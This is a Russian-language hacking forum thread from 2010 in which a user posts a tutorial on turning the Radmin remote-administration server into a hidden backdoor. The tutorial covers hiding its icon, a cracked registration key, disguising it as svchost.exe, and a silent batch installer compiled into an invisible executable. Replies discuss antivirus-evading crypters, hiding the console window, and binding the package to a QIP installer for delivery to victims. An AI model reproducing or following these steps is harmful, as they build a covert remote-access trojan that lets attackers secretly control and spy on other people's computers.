[Статья] Делаем скрытого Radmin'а.
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
[Статья] Делаем скрытого Radmin'а. - 2010-10-16 11:28:41.733333
|
|
|
Oxygen
Сообщений: 40
Оценки: 0
Присоединился: 2010-03-29 20:55:53.723333
|
Сижу, жду КВН, решил написать статью чтобы не терять время зря. Меньше слов, больше дела! Понадобятся: -Radmin 2.x версии -Resourse Hacker или Restorator -Редактор реестра с возможностью сохранения ключей в файл формата *.reg. Я использовал RegWorks -Bat To Exe Converter 1.Устанавливаем Radmin'а в отдельную папочку. 2.Заходим в настройки Radmin Servera'а, выставляем всё как нам нужно (советую стандартный порт сменить!), также не забудте поставить галочку на "Убрать иконку". 3.Открываем редактор реестра, ищем и сохраняем следующую ветвь (или параметр, как их там): HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters Назовём ключ settings.reg открываем его любым текстовым редактором и добавляем: [HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType] "Data"=hex:01,f6,99,b0,57,5c,13,80,18,6f,f3,fc,68,83,8e,bf,ca,4a,9c,5e,cc,f9,8e,7c,31,72, ae,28,31,5e,99,0b,9f,a4,89,61,fc,0c,e3,47,50,e3,06,08,f0,55,2b,80,b3,d4,c0,a8,15,36,27,f0,5f,8e,f7,b0,f5,b0,4b,db Это регистрация, без неё через 30 дней сервер перестанет работать. 4.Теперь заходим в папку с Radmin'ом и удаляем всё кроме: r_server.exe и AdmDll.dll , также можно оставить raddrv.dll -это драйвер видеозахвата и без него Radmin не сможет рабоать в режимах "Управление" и "Просмотр". Переименовываем Radmin Server во что-нибудь неприметное, например в svchost.exe . 5.Открываем r_server.exe Restorator'ом или Resourse Hackero'ом и удаляем всё кроме: "String Table" (по-русски "Строка") и "RCData". 6.Теперь пишем bat'ник для установки всего этого дела: 1)Копируем файлики в system32: copy /y "svchost.exe" "%SYSTEMROOT%/system32/svchost.exe" copy /y "AdmDll.dll" "%SYSTEMROOT%/system32/AdmDll.dll" copy /y "raddrv.dll" "%SYSTEMROOT%/system32/raddrv.dll" 2)Применяем необходимые нам настройки: %systemroot%\system32\regedt32.exe /s settings.reg Пояснения: Я указал полный путь к Regedit т.к. на моём компе команда regedit не канает. Ключ /s устанавливает ключ реестра без вопроса об установке. 3)Устанавливаем Radmin Server в автозагрузку и запускаем: "%SYSTEMROOT%/svchost.exe" /install /silence "%SYSTEMROOT%/svchost.exe" /start В итоге получается вот что: @echo off copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" copy /y "AdmDll.dll" "%SYSTEMROOT%/AdmDll.dll" copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll" %systemroot%\system32\regedt32.exe /s settings.reg "%SYSTEMROOT%/svchost.exe" /install /silence "%SYSTEMROOT%/svchost.exe" /start exit Но батник будет палится чёрным окном при работе, конечно, можно заюзать cmdow, но мы поступим умнее: Сконвертируем наш bat'ник программой Bat To Exe Converter , в настройках программы ставим отметку на "Invisible application" и компилим. Всё, теперь bat'ник будет работать скрытно. Вот в принципе и всё, наш скрытый Ramin готов. Но не решены следующие проблемы: 1.Желательно скучковать всё это дело каким-нибудь джойнером, только вот в чём загвоздка-джойнер будет запускать всё, что запускается. Поэтому settings.reg выдаст нас. Как вариант-можно settings.reg передавать одним файлом, но это палевно. 2.Как узнать IP. Эту проблему я решил, юзаю для этих целей IpBot Скачать З.Ы.:Если что не понятно-спрашивайте, постараюсь помочь. Также интересно послушать ваши идеи и предложения по данной теме. З.Ы.:Если нужно добавить ссылки на софт-скажите куда лучше закачать, добавлю.
|
|
|
RE: [Статья] Делаем скрытого Radmin'а. - 2010-10-17 12:36:22.383333
|
|
|
Rezz
Сообщений: 307
Оценки: 0
Присоединился: 2009-09-04 11:21:33.213333
|
Bat To Exe Converter палится Добась пару строк про крипторы
|
|
|
RE: [Статья] Делаем скрытого Radmin'а. - 2010-10-17 17:49:01.596666
|
|
|
Oxygen
Сообщений: 40
Оценки: 0
Присоединился: 2010-03-29 20:55:53.723333
|
К сожалению опробовав множество паблик крипторов-не нашёл ни одного не паляшегося антвирусами, а покупать приватные бюджет не позволяет. Окно bat'ника можно скрыть утилитой cmdow.exe, в батнике пишем: cmdow @ /HID , при этом cmdow должна быть на компе куда закидываем радмина. Как её туда закинуть-думайте сами =)
|
|
|
RE: [Статья] Делаем скрытого Radmin'а. - 2010-10-19 22:37:19.390000
|
|
|
DonKenny1
Сообщений: 77
Оценки: 0
Присоединился: 2010-08-22 15:22:40.673333
|
А не мог бы ты, объяснить подробнее как это всё склеить с какой нить прогой (например setup QIP) или ещё чем нибудь
|
|
|
RE: [Статья] Делаем скрытого Radmin'а. - 2010-10-20 07:51:06.066666
|
|
|
misterz09
Сообщений: 447
Оценки: 0
Присоединился: 2009-10-24 19:43:38.336666
|
Отписал вам в пм, очень нужна ваша помощь)
|
|
|
|
|